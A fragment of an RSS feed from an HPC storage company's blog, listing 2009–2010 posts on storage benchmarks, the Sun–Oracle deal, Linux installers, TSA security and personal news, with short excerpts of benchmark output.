      <description>Weофис обзавеждане are developing some marketing materials and pages for our siCluster systems. Also some new internal benchmark reports on JackRabbit, DeltaV, and other tools. Also, we have some contracts we are working on to supply some new benchmarks of some announced/delivered and announced/not-currently shipping chips. Have a variety of new things showing up in the lab &amp;hellip; would love to have the time to play with them &amp;hellip; will start our automated testing bits for now.</description>
    </item>
    
    <item>
      <title>Ruminations on performance ... the possible, the impossible, and things in between</title>
      <link>https://blog.scalability.org/2010/01/ruminations-on-performance-the-possible-the-impossible-and-things-in-between/</link>
      <pubDate>Sat, 30 Jan 2010 13:51:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/ruminations-on-performance-the-possible-the-impossible-and-things-in-between/</guid>
      <description>We are often asked what differentiates us from our competition. One of the more important aspects is our raw uncompromising performance. Our systems are fast. Not in a marketing number sense (I&amp;rsquo;ll get to this in a minute). But in real application fast. We take a no holds barred approach to performance design. And our customers do see this. Design, implementation, &amp;hellip; these are critical elements. Software stack, tuning &amp;hellip;. these are critical.</description>
    </item>
    
    <item>
      <title>Again, tremendously busy ... lots I want to write about</title>
      <link>https://blog.scalability.org/2010/01/again-tremendously-busy-lots-i-want-to-write-about/</link>
      <pubDate>Sat, 30 Jan 2010 11:04:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/again-tremendously-busy-lots-i-want-to-write-about/</guid>
      <description>please do bear with me.</description>
    </item>
    
    <item>
      <title>Sunacle ... Orasun ... the saga continues ...</title>
      <link>https://blog.scalability.org/2010/01/sunacle-orasun-the-saga-continues/</link>
      <pubDate>Wed, 27 Jan 2010 16:56:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/sunacle-orasun-the-saga-continues/</guid>
      <description>It does seem that Larry Ellison and his team are focused where they think Sun&amp;rsquo;s real value lies. From an article today in The Register, some of these plans are showing up in the press. For those not sure if things are done with, the JAVA symbol appear to be going going &amp;hellip; gone. You can still find a few reminents here. And one of its last 10Q filings, here. As I noted previously, Oracle isn&amp;rsquo;t dumb.</description>
    </item>
    
    <item>
      <title>The &#34;pony&#34; scale</title>
      <link>https://blog.scalability.org/2010/01/the-pony-scale/</link>
      <pubDate>Tue, 26 Jan 2010 07:25:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/the-pony-scale/</guid>
      <description>We get RFPs all the time. Some of these RFPs are genuine &amp;ldquo;show us good things so we can consider them.&amp;rdquo; Many are &amp;ldquo;we really want to buy something quite specific, but the rules won&amp;rsquo;t let us specify then.&amp;rdquo; Some of them have requirements or limits that make me think of a kid saying &amp;hellip; &amp;ldquo;and I want a pony too&amp;rdquo;. Such RFPs usually have a combination of reasonable sounding elements, right up to the point where they demand the pony.</description>
    </item>
    
    <item>
      <title>OT:  Joe&#39;s weekend adventure ... bo kata, sparring ...</title>
      <link>https://blog.scalability.org/2010/01/ot-joes-weekend-adventure-bo-kata-sparring/</link>
      <pubDate>Sun, 24 Jan 2010 17:38:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/ot-joes-weekend-adventure-bo-kata-sparring/</guid>
      <description>I had some karate fun over the weekend, participating at a tournament in Michigan. First tournament, never done this before. Ok, in high school, I did wrestling. Same long waits punctuated by fast action, in a make or break mode. The school I attend is here. Great instructors, nearly infinite patience for newbies like me. As long as I don&amp;rsquo;t screw up the player, here is the bo kata. I took second place in the over 35 group (and in the 18-34 group &amp;hellip; long story, don&amp;rsquo;t ask, but I am happy to have done better than some of them young whippersnappers :) ) I&amp;rsquo;ll put the sparring video up later.</description>
    </item>
    
    <item>
      <title>Sun-acle ... Orasun ... Java ...</title>
      <link>https://blog.scalability.org/2010/01/sun-acle-orasun-java/</link>
      <pubDate>Thu, 21 Jan 2010 15:51:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/sun-acle-orasun-java/</guid>
      <description>The acquisition has been given a green light in Europe. Now &amp;hellip; as to what this means after nearly 10 months of uncertainty to Sun&amp;rsquo;s remaining customers, the ones that haven&amp;rsquo;t fled to other vendors, may be a moot question. What this means to various markets is also unknown. We haven&amp;rsquo;t seen much focus of Oracle in HPC. Indeed, this is a tiny market for Sun (its not their forte), and given that Sun will be a small part of Oracle &amp;hellip;</description>
    </item>
    
    <item>
      <title>Hmmm ... I thought I was the only one who thought the Microsoft bots were aggressive ..</title>
      <link>https://blog.scalability.org/2010/01/hmmm-i-thought-i-was-the-only-one-who-thought-the-microsoft-bots-were-aggressive/</link>
      <pubDate>Mon, 18 Jan 2010 11:38:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hmmm-i-thought-i-was-the-only-one-who-thought-the-microsoft-bots-were-aggressive/</guid>
      <description>In this article on H-online, they noticed that the Microsoft bots are &amp;hellip; er &amp;hellip; aggressive. In the past, we&amp;rsquo;ve had to disable their 65.55.x.* access to our sites as they did not respect robots.txt. In the past year or so, they have behaved generally well, though we do notice the occasional blip. I suspect that their crawlers aren&amp;rsquo;t terribly smart. Google&amp;rsquo;s, yahoo&amp;rsquo;s, and many others are pretty sophisticated. No real problems with them anymore.</description>
    </item>
    
    <item>
      <title>Blown away at how annoying software installation is, on windows</title>
      <link>https://blog.scalability.org/2010/01/blown-away-at-how-annoying-software-installation-is-on-windows/</link>
      <pubDate>Mon, 18 Jan 2010 01:13:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/blown-away-at-how-annoying-software-installation-is-on-windows/</guid>
      <description>I&amp;rsquo;ve argued that RPM &amp;hellip; well &amp;hellip; building RPMs is bothersome, in part because RPM is a moving target. Its hard to actually build a reasonable package that works correctly on all RPM based or accessible distributions. But this is nothing compared to the pain that windows people feel. I never knew how much of a stinking pile of week old bits that windows software installation was &amp;hellip; that is &amp;hellip; until I needed to install a package, a simple basic storage controller package &amp;hellip; on a windows 2008 x64 server.</description>
    </item>
    
    <item>
      <title>Yeah, I blowed up da motherboard ... in the central server</title>
      <link>https://blog.scalability.org/2010/01/yeah-i-blowed-up-da-motherboard-in-the-central-server/</link>
      <pubDate>Sat, 16 Jan 2010 19:11:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/yeah-i-blowed-up-da-motherboard-in-the-central-server/</guid>
      <description>Yuppers. Updated the bios for the brand new 6 core AMD chips. And whammo. Motherboard was toast. Yessiree toast. A door jam. A square frisbee. So I swapped it out for a motherboard we are using for testing. On the plus side, scalableinformatics.com is now being served by a shiny new Nehalem E5504. On the down side &amp;hellip; I have a new square hockey puck. The exact same size and shape as the motherboard which used to be in Scalableinformatics.</description>
    </item>
    
    <item>
      <title>Been busy ... as usual</title>
      <link>https://blog.scalability.org/2010/01/been-busy-as-usual/</link>
      <pubDate>Sun, 10 Jan 2010 17:38:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/been-busy-as-usual/</guid>
      <description>The year is going hard and fast, right out of the gate. Multiple RFPs and new customers. New bits of business left and right. And lets not forget the support side &amp;hellip; this is using up lots of time as well. Sales hire is almost done &amp;hellip; not to offload, but to augment. Need to do a technical hire too, soon. More around Tuesday. I have some documentation I have to finish up, and rerun a whole lotta benchmarks for some customers.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millenium: a perspective, part 7</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-7/</link>
      <pubDate>Sun, 03 Jan 2010 19:20:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-7/</guid>
      <description>Storage changes In the beginning of the millenium, Fibre Channel ruled the roost. Nothing could touch it. SATA and SAS were a ways away. SCSI was used in smaller storage systems. Networked storage meant a large central server with ports. SANs were on the rise. In HPC you have to move lots of data. Huge amounts of data. Performance bottlenecks are no fun. FC is a slow technology. It is designed to connect as many disks as you can together for SAN architecture.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millenium: a perspective, part 6</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-6/</link>
      <pubDate>Sun, 03 Jan 2010 16:39:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-6/</guid>
      <description>The recycling of an older business model using newer technology ASPs began the decade promising to reduce OPEX and CAPEX for HPC systems. They flamed out, badly, as they really didn&amp;rsquo;t meet their promise, and you had all these nasty issues of data motion, security, jurisdiction, software licenses, utilization, and compatibility. The concept itself wasn&amp;rsquo;t bad, create an external data center where you can run stuff, and pay for what you use.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millenium: a perspective, part 5</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-5/</link>
      <pubDate>Sun, 03 Jan 2010 15:56:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-5/</guid>
      <description>Accelerators in HPC &amp;hellip; In 2002, my business partner (he wasn&amp;rsquo;t then), showed me these Cradle SOC chips. 40 cores or something like that, on a single chip, in 2002 time frame. My comment to him was, we should figure out a way to put a whole helluva lotta them (e.g. many chips with RAM etc) onto PCI cards, with programming environments. Make them easy to use. Easy to program. We spent the next 2-3 years looking at a bunch of architectures, a bunch of chips.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millenium: a perspective, part 4</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-4/</link>
      <pubDate>Sun, 03 Jan 2010 15:52:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-4/</guid>
      <description>The impact of markets, and government upon HPC &amp;hellip; While the charts from top500.org are nice, they don&amp;rsquo;t tell everything that happened in this interval. We had 3 recessions, 2 major (2001 and the &amp;ldquo;Great Recession&amp;rdquo;) and 1 minor one. We had significant changes in research funding from the US federal government &amp;hellip; a refocusing of DARPA on things less HPC specific. These elements all contributed to the trajectory within the decade.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millenium: a perspective, part 3</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-3/</link>
      <pubDate>Sun, 03 Jan 2010 15:49:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-3/</guid>
      <description>The relentless onslaught of clusters &amp;hellip; We are also mostly doing SMPs and MPPs then. Clusters are barely registering. See the chart and the data to get more perspective. What happened in the market was a simple alteration of the cost scale per flop. Clusters provided massive numbers of cheap cycles. Add to this that MPI has been standardized, reasonably well designed, and people were migrating codes to it. Funny, MPI on a cluster runs just as nicely as MPI on the SGI.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millenium: a perspective, part 2</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-2/</link>
      <pubDate>Sun, 03 Jan 2010 15:48:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-2/</guid>
      <description>The death of RISC &amp;hellip;
obligatory Monty Python Holy Grail quote: old man: I&amp;rsquo;m not dead yet, I think I&amp;rsquo;ll go for a walk John Cleese: Look, you are not fooling anyone &amp;hellip;
The RISC vendors (SGI, HP, IBM, &amp;hellip;) realized that RISC was dead, and that EPIC would be the technology that killed it. I was at SGI at the time, and disagreed that EPIC (Itanium) was going to be the killer.</description>
    </item>
    
    <item>
      <title>HPC in the first decade of a new millenium: a perspective, part 1</title>
      <link>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-1/</link>
      <pubDate>Sun, 03 Jan 2010 15:45:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/hpc-in-the-first-decade-of-a-new-millenium-a-perspective-part-1/</guid>
      <description>[Update: 9-Jan-2010] Link fixed, thanks Shehjar! This is sort of another itch I need to scratch. Please bear with me. This is a long read, and I am breaking it up into multiple posts so you don&amp;rsquo;t have to read this as a huge novel in and of itself. Many excellent blogs and news sites are giving perspectives on 2009. Magazine sites are talking about the hits in HPC over the last year in computing, storage, networking.</description>
    </item>
    
    <item>
      <title>pbzip2, how do I love thee?  Let me count the ways ...</title>
      <link>https://blog.scalability.org/2010/01/pbzip2-how-do-i-love-thee-let-me-count-the-ways/</link>
      <pubDate>Sat, 02 Jan 2010 23:16:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/01/pbzip2-how-do-i-love-thee-let-me-count-the-ways/</guid>
      <description>dstat output on a 10GB pbzip2 compressed file being uncompressed &amp;hellip; with pbzip2.
----total-cpu-usage---- -dsk/total- -net/total- ---paging-- ---system-- usr sys idl wai hiq siq| read writ| recv send| in out | int csw 49 3 42 5 0 0| 35M 95M|3168B 6978B| 0 28k|1575 1198 52 4 39 5 0 0| 39M 188M|2508B 5230B| 0 80k|1769 1475 51 4 40 5 0 0| 19M 206M|4686B 9390B| 0 0 |2396 2240 42 4 48 5 0 0| 31M 158M|3054B 5360B| 0 16k|1820 2025 50 5 40 5 0 0| 37M 115M|2640B 5360B| 0 104k|1731 1564 38 4 50 8 0 0| 24M 105M|3102B 6270B| 0 0 |1639 1477 ^C  Run &amp;hellip; don&amp;rsquo;t walk &amp;hellip; to get pbzip2.</description>
    </item>
    
    <item>
      <title>Non-theatrical security</title>
      <link>https://blog.scalability.org/2009/12/non-theatrical-security/</link>
      <pubDate>Mon, 28 Dec 2009 09:56:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/non-theatrical-security/</guid>
      <description>As it turns out, a good friend was on that Northwest flight. I won&amp;rsquo;t identify him (though I know he reads this blog occasionally). What happened to him has made me think of my own responses in such a scenario. But it has also made me question the TSA&amp;rsquo;s kneejerk ineffective new guidelines. Especially in light of the potential accuracy of this report, if true, suggests that real security measures ought to be taken.</description>
    </item>
    
    <item>
      <title>Oh. Yeah.</title>
      <link>https://blog.scalability.org/2009/12/oh-yeah/</link>
      <pubDate>Sun, 27 Dec 2009 04:40:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/oh-yeah/</guid>
      <description>Two days ago, some nutjob wanted to blow up an airplane 20 minutes out from the airport I live 15 minutes from. Said nutjob is apparently in a hospital in Ann Arbor, again, 20 minutes away from us. Today, the TSA is closing the barn doors after all the horses have left. I am going to follow their train of illogic to its inevitable conclusion. At some point in time in the future, our TSA won&amp;rsquo;t allow planes to take off and land until all passengers are in a chemically induced coma.</description>
    </item>
    
    <item>
      <title>simple minded sprints with JackRabbit Flash</title>
      <link>https://blog.scalability.org/2009/12/simple-minded-sprints-with-jackrabbit-flash/</link>
      <pubDate>Mon, 21 Dec 2009 00:03:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/simple-minded-sprints-with-jackrabbit-flash/</guid>
      <description>A quick and dirty test on a JackRabbit Flash machine. This is a machine going to a proof of concept project soon. A simple 8k random read against 256GB data spread out over 4 volumes. 1 machine. 48GB ram. Open up the throttle on the stock config. Engines aren&amp;rsquo;t running at full speed, but its a baseline test.
random: (groupid=0, jobs=256): err= 0: pid=18717 read : io=262144MB, bw=733052KB/s, iops=91631, runt=366189msec clat (usec): min=296, max=184778, avg=2777.</description>
    </item>
    
    <item>
      <title>What I really want to do is to disable device-mapper on install ...</title>
      <link>https://blog.scalability.org/2009/12/what-i-really-want-to-do-is-to-disable-device-mapper-on-install/</link>
      <pubDate>Sun, 20 Dec 2009 15:35:38 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/what-i-really-want-to-do-is-to-disable-device-mapper-on-install/</guid>
      <description>Sometimes &amp;hellip; sometimes &amp;hellip; helpful utilities are helpful. Like installation systems that present the raw hardware with drivers to me, and let ME decide what I want to do with them. Unfortunately &amp;hellip; I often run head first into bad choices made by the installer coders or architects. Dm-raid is one of these cases. It is very hard to disable it from a Centos install. Very hard. Pretty close to damn near impossible.</description>
    </item>
    
    <item>
      <title>Interview from SC09 posted at techinsight.tv</title>
      <link>https://blog.scalability.org/2009/12/interview-from-sc09-posted-at-techinsight-tv/</link>
      <pubDate>Sun, 13 Dec 2009 20:19:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/interview-from-sc09-posted-at-techinsight-tv/</guid>
      <description>I did a few interviews, ranging from bloggers through journalists. This interview is one of the mix. By all means, please do go to their site and see it, and their text around it.
I had much more to say, this is an edited down version. Basically I ran the Kx kdb+ demo, the dd demo, and a few other demos while talking. Doug was off on my right, probably laughing at me as I jumbled some things up &amp;hellip; The hand bit?</description>
    </item>
    
    <item>
      <title>Ceph client nearly ready to go into kernel ...</title>
      <link>https://blog.scalability.org/2009/12/ceph-client-nearly-ready-to-go-into-kernel/</link>
      <pubDate>Sun, 13 Dec 2009 20:05:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/ceph-client-nearly-ready-to-go-into-kernel/</guid>
      <description>Sage Weil has posted on this. Ceph is distributed file system, with an MDS, and a few other things, that looks quite interesting. Not necessarily on the high performance side, but on the simple object storage side. The client going in to 2.6.33 could be quite interesting. Pay attention to Ceph. Think of Lustre, without the nasty kernel requirements on server and client, and with in-kernel support. Including Ceph within the kernel (the second!</description>
    </item>
    
    <item>
      <title>The danger of controlling too much of your stack ...</title>
      <link>https://blog.scalability.org/2009/12/the-danger-of-controlling-too-much-of-your-stack/</link>
      <pubDate>Thu, 10 Dec 2009 01:54:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/the-danger-of-controlling-too-much-of-your-stack/</guid>
      <description>This is related to an issue we ran in to, today, and several other times. It sounds strange, but if you maintain rigid control over a huge swath of your stack, you run a fairly serious risk of being unable to respond to changing environments as quickly as your competition. The law of un-intended consequences bites you, fairly hard. Worse, you rarely, if ever, realize it, until it is too late.</description>
    </item>
    
    <item>
      <title>Just one of them days ...</title>
      <link>https://blog.scalability.org/2009/12/just-one-of-them-days/</link>
      <pubDate>Wed, 09 Dec 2009 01:55:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/just-one-of-them-days/</guid>
      <description>We had a bunch of parts overnighted so we could start building some machines. Turns out one critical part for mounting the heat sinks was missing. If that part doesn&amp;rsquo;t arrive tomorrow, we&amp;rsquo;ll have to do a work around near term, and worst case, use a slightly different MB/mount for this, as we have that part for that MB. Do-able for this unit, but annoying as all heck. And of course it is time critical.</description>
    </item>
    
    <item>
      <title>Just too funny ...</title>
      <link>https://blog.scalability.org/2009/12/just-too-funny-2/</link>
      <pubDate>Tue, 08 Dec 2009 14:34:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/just-too-funny-2/</guid>
      <description>XKCD comic from a few days ago ..
[ ](http://www.xkcd.com/)
reminds me of the spherical horse joke I used to tell &amp;hellip; For those not in the know, physicists like to reduce complex problems to simpler problems, solve the simpler problem &amp;hellip; so when designing a faster race-horse, why not make the horse spherical rather than its equine shape, figure out what slows down a spherical horse, then that should be similar for the equine shaped horse &amp;hellip; right?</description>
    </item>
    
    <item>
      <title>Perl 6 looks quite good</title>
      <link>https://blog.scalability.org/2009/12/perl-6-looks-quite-good/</link>
      <pubDate>Sun, 06 Dec 2009 20:21:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/perl-6-looks-quite-good/</guid>
      <description>I had a chance to look at the perl 6 advent calendar. What caught my eye was yesterdays post. In it, meta operators are explained. So here is a common HPC pattern, a reduction operation. Say a sum reduction. Suppose you want to sum up the values in some vector A. In Perl, A would be represented by a list, @a. To get the sum over the elements, you can do this: $sum = [+] @a; which means apply the sum operator &amp;ldquo;+&amp;rdquo;, between elements of the list.</description>
    </item>
    
    <item>
      <title>Day job will be opening a technical sales position shortly ...</title>
      <link>https://blog.scalability.org/2009/12/day-job-will-be-opening-a-technical-sales-position-shortly/</link>
      <pubDate>Sat, 05 Dec 2009 14:52:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/day-job-will-be-opening-a-technical-sales-position-shortly/</guid>
      <description>See the day job site for details soon (next week?) for the posting.</description>
    </item>
    
    <item>
      <title>This year is one for the record books ...</title>
      <link>https://blog.scalability.org/2009/12/this-year-is-one-for-the-record-books/</link>
      <pubDate>Thu, 03 Dec 2009 17:55:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/this-year-is-one-for-the-record-books/</guid>
      <description>We passed an important milestone today. Well, ok, we passed it earlier in the week. But this is our best year to date on record. And the year isn&amp;rsquo;t over &amp;hellip; still 28 days left &amp;hellip;.</description>
    </item>
    
    <item>
      <title>siCluster decloaking</title>
      <link>https://blog.scalability.org/2009/12/sicluster-decloaking/</link>
      <pubDate>Wed, 02 Dec 2009 18:41:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/sicluster-decloaking/</guid>
      <description>The day job pushed the announcement which went into the SC09 PR black hole out the door today. Also, the first installation is also indicated in the next announcement &amp;hellip; Scalable Informatics Introduces siCluster, an Innovative and Highly Scalable Performance Storage Cluster Canton, MI, Dec 2, 2009 - Scalable Informatics Inc., a provider of innovative high performance storage and computing solutions, announces the availability of their new siCluster??? storage cluster product (http://scalableinformatics.</description>
    </item>
    
    <item>
      <title>I am not sure I should be amused, but I am ...</title>
      <link>https://blog.scalability.org/2009/12/i-am-not-sure-i-should-be-amused-but-i-am/</link>
      <pubDate>Wed, 02 Dec 2009 14:57:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/i-am-not-sure-i-should-be-amused-but-i-am/</guid>
      <description>The day job has a registration page for people who are interested in purchasing high performance storage, deskside supercomputing, storage clusters, and other HPC like things from us. This registration page asks some very simple things: who are you, where are you, what your shipping/billing address is, what you want your user name to be, and what things you want information on. Registration is, fundamentally, a matter of trust. We guarantee we will not spam people.</description>
    </item>
    
    <item>
      <title>Storage cluster drag racing ...</title>
      <link>https://blog.scalability.org/2009/12/storage-cluster-drag-racing/</link>
      <pubDate>Tue, 01 Dec 2009 23:54:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/storage-cluster-drag-racing/</guid>
      <description>&amp;hellip; well, I am trying to figure out what I am doing wrong in io-bm. I need a new method to defeat some of the smarter caching bits, my MPI_Send/MPI_Recv pairs are blocking pairs, and this impacted performance. Not only that, the additional traffic over the Infiniband was definitely a cause of contention on the wire. Doing some TB sized writes at a good rate. The &amp;ldquo;naive&amp;rdquo; bandwidths (the way IOzone calculates them) are about where we predicted given the measured IB performance.</description>
    </item>
    
    <item>
      <title>OT: ethics and transparency in scientific communications</title>
      <link>https://blog.scalability.org/2009/11/ot-ethics-and-transparency-in-scientific-communications/</link>
      <pubDate>Sun, 29 Nov 2009 03:36:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/ot-ethics-and-transparency-in-scientific-communications/</guid>
      <description>This is more of an itch I need to scratch. I am a recovering/reformed computational physicist. I really enjoyed doing work in modeling semiconductors, and I had hoped to post-doc modeling dynamics of proteins among other things. Of course, my academic career ran head first into the deluge of physicists from the former soviet union, all with 20+ year seniority, all willing to work for less money. A generation of young physicists were lost to this onslaught; I decided to do something else after finishing up.</description>
    </item>
    
    <item>
      <title>Nice to know I&#39;ve had an impact on language ...</title>
      <link>https://blog.scalability.org/2009/11/nice-to-know-ive-had-an-impact-on-language/</link>
      <pubDate>Sat, 28 Nov 2009 21:29:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/nice-to-know-ive-had-an-impact-on-language/</guid>
      <description>From this article linked from /., I found this tidbit
Heh. I wonder if anyone else used that term, for accelerators, before they did. I wonder. APUs are taking HPC by storm. This is creative destruction you are witnessing. We moved mostly out of the market being destroyed over the last year or so, and focused upon the market being created. It absolutely blows me over that Vipin&amp;rsquo;s and my strategy pitch is being played, almost to the letter, by the successful players in this market.</description>
    </item>
    
    <item>
      <title>IBM shelves Cell</title>
      <link>https://blog.scalability.org/2009/11/ibm-shelves-cell/</link>
      <pubDate>Fri, 27 Nov 2009 05:37:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/ibm-shelves-cell/</guid>
      <description>It looks like IBM is going to shelf the Power Cell processor. Cell during its lifetime never really garnered the ubiquity it needed to do what NVidia is doing with GPU. I had guessed on this site previously that Cell needed to get wider distribution to maintain a base. The business model for acceleration is ubiquity, and then its a tools play. Unfortunately IBM never really seemed to commit to the platform.</description>
    </item>
    
    <item>
      <title>I keep forgetting how brittle anaconda is ...</title>
      <link>https://blog.scalability.org/2009/11/i-keep-forgetting-how-brittle-anaconda-is/</link>
      <pubDate>Thu, 26 Nov 2009 09:17:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/i-keep-forgetting-how-brittle-anaconda-is/</guid>
      <description>&amp;hellip; until I need to use it. Anaconda is the Redhat/Fedora installer. It purports to be a reasonable installation tool. But it has a number of interesting issues. Some of these issues make installs &amp;hellip; well &amp;hellip; exciting. I&amp;rsquo;ve taken to the philosophy of absolute minimum time spent in anaconda. Call this defensive installation. Anaconda will toss fatal errors, with no hope of recovery &amp;hellip; unless you want to try and debug some obscure python &amp;hellip; Back in the SGI days, I wrote an installer that largely worked around the SGI installer.</description>
    </item>
    
    <item>
      <title>Designing the next generation of our storage systems</title>
      <link>https://blog.scalability.org/2009/11/designing-the-next-generation-of-our-storage-systems/</link>
      <pubDate>Sun, 22 Nov 2009 06:25:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/designing-the-next-generation-of-our-storage-systems/</guid>
      <description>Back from SC09, and for a project Vipin asked me to work on quickly, I am cranking out our roadmaps in greater detail. One of the things I&amp;rsquo;ve been thinking of for a long time is, what comes after JackRabbit and DeltaV? In the case of JackRabbit, even when it is hobbled by a poorly performing IB network (we are still working on why this is the case), we appear to kick some serious tail in the high performance cluster storage space &amp;hellip; our worst case result was 4x faster than a competitors best case on the same problem (info was presented at SC09 in a public talk by the user, so I think its ok to talk about, if not, let me know and I&amp;rsquo;ll elide this).</description>
    </item>
    
    <item>
      <title>One of the best (funniest) quotes from #SC09</title>
      <link>https://blog.scalability.org/2009/11/one-of-the-best-funniest-quotes-from-sc09/</link>
      <pubDate>Sat, 21 Nov 2009 15:26:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/one-of-the-best-funniest-quotes-from-sc09/</guid>
      <description>From HPCwire &amp;hellip;
Like &amp;hellip; totally &amp;hellip; Ok &amp;hellip; apart from the humor in the quote (and I am hoping that Allan or the writer meant that comment to be interpreted in a semi-humorous manner &amp;hellip; its also very possible Allan didn&amp;rsquo;t say that and the writer took &amp;hellip; er &amp;hellip; liberties &amp;hellip; yeah thats it &amp;hellip; and decided to embark on a more, how shall I say this &amp;hellip; creative writing effort than more serious journalism &amp;hellip; embellish it a bit), there is another thread that is worth discussing.</description>
    </item>
    
    <item>
      <title>#sc09 [T&#43;2] user benchmarks of the MSI storage cluster</title>
      <link>https://blog.scalability.org/2009/11/sc09-t2-user-benchmarks-of-the-msi-storage-cluster/</link>
      <pubDate>Thu, 19 Nov 2009 07:07:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t2-user-benchmarks-of-the-msi-storage-cluster/</guid>
      <description>Minnesota Supercomputing Institute purchased the first siCluster (PR on disk, finishing up and getting out tomorrow), which is a scalable storage cluster product, aimed at providing very scalable performance and capacity. I was worried after the talk I gave at their booth. Their researcher indicated our performance wasn&amp;rsquo;t good. We had turned off some caching to avoid problems during the acceptance test for HP, the Itasca cluster vendor. The Itasca cluster is quite nice.</description>
    </item>
    
    <item>
      <title>#sc09 [T&#43;2]  its like drinking from a fire hose ...</title>
      <link>https://blog.scalability.org/2009/11/sc09-t2-its-like-drinking-from-a-fire-hose/</link>
      <pubDate>Thu, 19 Nov 2009 06:59:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t2-its-like-drinking-from-a-fire-hose/</guid>
      <description>Ok &amp;hellip; so so many things going on. All at once. I&amp;rsquo;ve done what &amp;hellip; like 3 on camera interviews over the last 48 hours, and have another one coming up. I&amp;rsquo;ve given a talk, and attended a talk. More on that in the next post. Ok. Vipin needs me to work on something tonight, so I might not get nearly as much sleep as I want. Gotta hit the gym tomorrow too.</description>
    </item>
    
    <item>
      <title>Sabalcore Computing Has Selected Scalable Informatics as Their Primary Storage Vendor</title>
      <link>https://blog.scalability.org/2009/11/sabalcore-computing-has-selected-scalable-informatics-as-their-primary-storage-vendor/</link>
      <pubDate>Tue, 17 Nov 2009 09:02:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sabalcore-computing-has-selected-scalable-informatics-as-their-primary-storage-vendor/</guid>
      <description>See the press release. Sabalcore (fka Tsunamic Technologies) is a cluster-on-demand vendor, providing high performance computing without the hassle of buying/maintaining your own.</description>
    </item>
    
    <item>
      <title>#sc09 [T-0]  NFS over 10GbE at 1 GB/s</title>
      <link>https://blog.scalability.org/2009/11/sc09-t-0-nfs-over-10gbe-at-1-gbs/</link>
      <pubDate>Tue, 17 Nov 2009 02:10:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t-0-nfs-over-10gbe-at-1-gbs/</guid>
      <description>Just thought we&amp;rsquo;d run some nice little performance tests using io-bm (yeah, I know, I have to release it already). Remember, this is booth 635 if you want us to do this live &amp;hellip; Here is a write, from the Pegasus, to the JR4. Over a single 10GbE link.
scalable@pegasus:~$ /opt/openmpi133/bin/mpirun -v -np 4 `pwd`/io-bm.exe -n 32 -w -f /data/jr4/nfs/io-bm-test ... Thread=3: time = 32.682s IO bandwidth = 250.655 MB/s Thread=0: time = 32.</description>
    </item>
    
    <item>
